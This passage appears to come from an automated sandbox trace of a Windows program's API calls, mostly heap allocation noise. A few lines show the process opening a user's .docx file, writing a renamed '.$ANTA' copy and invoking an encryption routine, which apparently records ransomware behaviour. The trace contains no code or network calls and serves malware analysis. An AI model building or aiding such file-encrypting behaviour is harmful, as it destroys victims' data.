hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0075.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0075.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0075.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0075.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0075.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0075.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0075.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0075.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0075.529] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0075.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0075.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0075.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0075.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0075.529] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0075.529] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0075.529] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0075.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0075.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0075.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0075.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0075.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0075.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0075.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0075.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0075.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0075.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0075.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0075.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0075.530] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\59kI0eZovuo4vI8.docx" (normalized: "c:\\users\\fd1hvy\\documents\\59ki0ezovuo4vi8.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0075.530] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.530] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0075.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0075.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0075.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0075.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0075.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0075.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0075.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0075.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.530] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0075.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0075.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0075.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0075.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0075.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0075.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0075.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0075.531] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0075.531] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0075.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0075.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0075.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0075.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0075.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0075.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0075.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0075.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0075.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0075.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0075.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0075.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0075.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0075.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0075.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0075.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0075.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0075.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0075.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0075.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0075.532] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0075.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0075.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0075.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0075.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0075.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0075.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0075.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0075.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0075.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0075.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0075.532] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\59kI0eZovuo4vI8.docx.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\59ki0ezovuo4vi8.docx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0075.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0075.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0075.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0075.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0075.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0075.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0075.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0075.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.533] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0075.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0075.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0075.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0075.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0075.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0075.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0075.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0075.533] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0075.533] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0075.534] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0075.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0075.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0075.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0075.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0075.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0075.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0075.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0075.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0075.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0075.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0075.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0075.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0075.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0075.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0075.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0e020 [0075.537] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0075.537] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x6823, lpOverlapped=0x0) returned 1 [0075.538] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0075.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0075.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0075.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0075.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0075.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6823) returned 0x440b3b8 [0075.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0e020 | out: hHeap=0x1780000) returned 1 [0075.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0075.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0075.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0075.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0075.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6823) returned 0x4411be8 [0075.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x440b3b8 | out: hHeap=0x1780000) returned 1 [0075.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0075.541] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0075.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0075.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0075.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0075.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0075.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6823) returned 0x440b3b8 [0075.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0075.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x440b3b8 | out: hHeap=0x1780000) returned 1 [0075.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0075.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0075.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0075.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0075.542] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0075.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0075.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0075.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0075.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0075.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0075.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0075.542] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0075.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0075.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0075.542] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0075.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0075.542] HeapFree (in: 